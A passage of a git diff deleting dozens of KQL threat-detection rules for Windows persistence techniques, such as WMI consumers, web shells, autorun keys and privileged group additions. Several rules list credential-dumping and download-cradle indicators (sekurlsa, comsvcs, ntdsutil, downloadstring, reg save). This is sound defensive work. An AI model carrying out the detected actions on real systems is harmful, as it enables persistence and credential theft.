-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or isnull(ProcessCommandLine) or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg"))))
\ No newline at end of file
diff --git a/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
deleted file mode 100644
index 63e818d3..00000000
--- a/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/07/15
-// Level: high
-// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/Persistence/Uncommon_Userinit_Child_Process.kql b/Persistence/Uncommon_Userinit_Child_Process.kql
deleted file mode 100644
index 6b52304c..00000000
--- a/Persistence/Uncommon_Userinit_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton
-// Date: 2019/01/12
-// Level: high
-// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
-// Tags: attack.t1037.001, attack.persistence
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(FolderPath endswith ":\\WINDOWS\\explorer.exe")) and (not(((FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\System32\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\System32\\icast.exe") or isnull(FolderPath) or (ProcessCommandLine contains "netlogon.bat" or ProcessCommandLine contains "UsrLogon.cmd") or (FolderPath endswith ":\\Windows\\System32\\proquota.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\proquota.exe") or ProcessCommandLine =~ "PowerShell.exe")))
\ No newline at end of file
diff --git a/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql b/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
deleted file mode 100644
index 61f33107..00000000
--- a/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/31
-// Level: medium
-// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Persistence/User_Added_To_Highly_Privileged_Group.kql b/Persistence/User_Added_To_Highly_Privileged_Group.kql
deleted file mode 100644
index 5ffd354c..00000000
--- a/Persistence/User_Added_To_Highly_Privileged_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/23
-// Level: high
-// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.t1098
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Group Policy Creator Owners" or ProcessCommandLine contains "Schema Admins") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Persistence/User_Added_to_Local_Administrators_Group.kql b/Persistence/User_Added_to_Local_Administrators_Group.kql
deleted file mode 100644
index 7cd2e84d..00000000
--- a/Persistence/User_Added_to_Local_Administrators_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: medium
-// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.t1098
-DeviceProcessEvents
-| where (ProcessCommandLine contains " administrators " or ProcessCommandLine contains " administrateur") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql b/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql
deleted file mode 100644
index b8bb4681..00000000
--- a/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/06
-// Level: high
-// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.lateral_movement, attack.t1133, attack.t1136.001, attack.t1021.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Persistence/VBScript_Payload_Stored_in_Registry.kql b/Persistence/VBScript_Payload_Stored_in_Registry.kql
deleted file mode 100644
index 9973f4c1..00000000
--- a/Persistence/VBScript_Payload_Stored_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/05
-// Level: high
-// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where ((RegistryValueData contains "vbscript:" or RegistryValueData contains "jscript:" or RegistryValueData contains "mshtml," or RegistryValueData contains "RunHTMLApplication" or RegistryValueData contains "Execute(" or RegistryValueData contains "CreateObject" or RegistryValueData contains "window.close") and RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion") and (not((RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ((RegistryValueData contains "\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" or RegistryValueData contains "<\\Microsoft.mshtml,fileVersion=" or RegistryValueData contains "_mshtml_dll_" or RegistryValueData contains "<\\Microsoft.mshtml,culture=") and InitiatingProcessFolderPath endswith "\\msiexec.exe" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData"))))
\ No newline at end of file
diff --git a/Persistence/VMToolsd_Suspicious_Child_Process.kql b/Persistence/VMToolsd_Suspicious_Child_Process.kql
deleted file mode 100644
index fcf64329..00000000
--- a/Persistence/VMToolsd_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: bohops, Bhabesh Raj
-// Date: 2021/10/08
-// Level: high
-// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe"))))
\ No newline at end of file
diff --git a/Persistence/VsCode_Powershell_Profile_Modification.kql b/Persistence/VsCode_Powershell_Profile_Modification.kql
deleted file mode 100644
index 6d500082..00000000
--- a/Persistence/VsCode_Powershell_Profile_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/24
-// Level: medium
-// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1"
\ No newline at end of file
diff --git a/Persistence/WINEKEY_Registry_Modification.kql b/Persistence/WINEKEY_Registry_Modification.kql
deleted file mode 100644
index 40b59710..00000000
--- a/Persistence/WINEKEY_Registry_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72
-// Date: 2020/10/30
-// Level: high
-// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor
-// Tags: attack.persistence, attack.t1547
-DeviceRegistryEvents
-| where RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr"
\ No newline at end of file
diff --git a/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
deleted file mode 100644
index 3f40bc3a..00000000
--- a/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/09/02
-// Level: medium
-// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql b/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql
deleted file mode 100644
index 653e625e..00000000
--- a/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/11
-// Level: critical
-// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
-// Tags: attack.persistence, attack.t1546.003
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\EdgeTransport.exe" and (not((FolderPath =~ "C:\\Windows\\System32\\conhost.exe" or (FolderPath endswith "\\Bin\\OleConverter.exe" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\"))))
\ No newline at end of file
diff --git a/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql b/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql
deleted file mode 100644
index 90563eab..00000000
--- a/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: high
-// Description: Detects WMI command line event consumers
-// Tags: attack.t1546.003, attack.persistence
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" and FolderPath endswith "\\wbemcons.dll"
\ No newline at end of file
diff --git a/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql b/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql
deleted file mode 100644
index 36c7415d..00000000
--- a/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: medium
-// Description: Detects WMI script event consumers
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.003
-DeviceProcessEvents
-| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql b/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql
deleted file mode 100644
index a3d5d209..00000000
--- a/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: high
-// Description: Detects file writes of WMI script event consumer
-// Tags: attack.t1546.003, attack.persistence
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe"
\ No newline at end of file
diff --git a/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql b/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql
deleted file mode 100644
index 9eba69fe..00000000
--- a/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community
-// Date: 2017/01/01
-// Level: high
-// Description: Detects certain command line parameters often used during reconnaissance activity via web shells
-// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "cd /d ") or ((FolderPath endswith "\\dsquery.exe" or FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\pathping.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\tracert.exe" or FolderPath endswith "\\ver.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\whoami.exe") or (ProcessVersionInfoOriginalFileName in~ ("dsquery.exe", "find.exe", "findstr.exe", "ipconfig.exe", "netstat.exe", "nslookup.exe", "pathping.exe", "quser.exe", "schtasks.exe", "sysinfo.exe", "tasklist.exe", "tracert.exe", "ver.exe", "VSSADMIN.EXE", "wevtutil.exe", "whoami.exe"))) or (ProcessCommandLine contains " Test-NetConnection " or ProcessCommandLine contains "dir \\") or ((ProcessCommandLine contains " user " or ProcessCommandLine contains " use " or ProcessCommandLine contains " group ") and (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) or (ProcessCommandLine contains " -n " and ProcessVersionInfoOriginalFileName =~ "ping.exe") or (ProcessCommandLine contains " /node:" and ProcessVersionInfoOriginalFileName =~ "wmic.exe"))
\ No newline at end of file
diff --git a/Persistence/Webshell_Hacking_Activity_Patterns.kql b/Persistence/Webshell_Hacking_Activity_Patterns.kql
deleted file mode 100644
index e8ef37ec..00000000
--- a/Persistence/Webshell_Hacking_Activity_Patterns.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/17
-// Level: high
-// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
-
-// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "comsvcs") or (ProcessCommandLine contains " -hp" and ProcessCommandLine contains " a " and ProcessCommandLine contains " -m") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " user " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " localgroup " and ProcessCommandLine contains " administrators " and ProcessCommandLine contains "/add") or (FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\ldifde.exe" or FolderPath endswith "\\adfind.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\Nanodump.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\fsutil.exe") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains " sekurlsa" or ProcessCommandLine contains ".dmp full" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "process call create" or ProcessCommandLine contains "reg save " or ProcessCommandLine contains "whoami /priv"))
\ No newline at end of file
diff --git a/Persistence/Webshell_Tool_Reconnaissance_Activity.kql b/Persistence/Webshell_Tool_Reconnaissance_Activity.kql
deleted file mode 100644
index 84af50a2..00000000
--- a/Persistence/Webshell_Tool_Reconnaissance_Activity.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Cian Heasley, Florian Roth (Nextron Systems)
-// Date: 2020/07/22
-// Level: high
-// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
-
-// Tags: attack.persistence, attack.t1505.003
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "CATALINA_HOME" or ProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and (ProcessCommandLine contains "perl --help" or ProcessCommandLine contains "perl -h" or ProcessCommandLine contains "python --help" or ProcessCommandLine contains "python -h" or ProcessCommandLine contains "python3 --help" or ProcessCommandLine contains "python3 -h" or ProcessCommandLine contains "wget --help")
\ No newline at end of file
diff --git a/Persistence/WinSock2_Autorun_Keys_Modification.kql b/Persistence/WinSock2_Autorun_Keys_Modification.kql
deleted file mode 100644
index 62710efd..00000000
--- a/Persistence/WinSock2_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" and (RegistryKey contains "\\Protocol_Catalog9\\Catalog_Entries" or RegistryKey contains "\\NameSpace_Catalog5\\Catalog_Entries") and (not((RegistryValueData =~ "(Empty)" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe")))
\ No newline at end of file
diff --git a/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql
deleted file mode 100644
index e0568272..00000000
--- a/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Thomas Patzke (improvements)
-// Date: 2021/06/29
-// Level: informational
-// Description: Detect DLL Load from Spooler Service backup folder
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527
-DeviceImageLoadEvents
-| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe"
\ No newline at end of file
diff --git a/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql b/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql
deleted file mode 100644
index ac3d2959..00000000
--- a/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/22
-// Level: medium
-// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
-// Tags: attack.persistence, attack.t1547.015
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and FolderPath endswith "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
\ No newline at end of file
diff --git a/Persistence/Winget_Admin_Settings_Modification.kql b/Persistence/Winget_Admin_Settings_Modification.kql
deleted file mode 100644
index 4043350a..00000000
--- a/Persistence/Winget_Admin_Settings_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: low
-// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey startswith "\\REGISTRY\\A"
\ No newline at end of file
diff --git a/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql b/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql
deleted file mode 100644
index 9143ea08..00000000
--- a/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
-Which allows for multiple Remote Desktop connection sessions to be opened at once.
-This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
-
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions"
\ No newline at end of file
diff --git a/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql b/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql
deleted file mode 100644
index bbc905d0..00000000
--- a/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: high
-// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
-Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
-
-// Tags: attack.persistence, attack.t1547.004
-DeviceRegistryEvents
-| where RegistryValueData endswith ".dll" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon"
\ No newline at end of file
diff --git a/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql
deleted file mode 100644
index 30f433a7..00000000
--- a/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Wow6432Node\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\ShellEx\\ColumnHandlers" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql
deleted file mode 100644
index bb361746..00000000
--- a/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
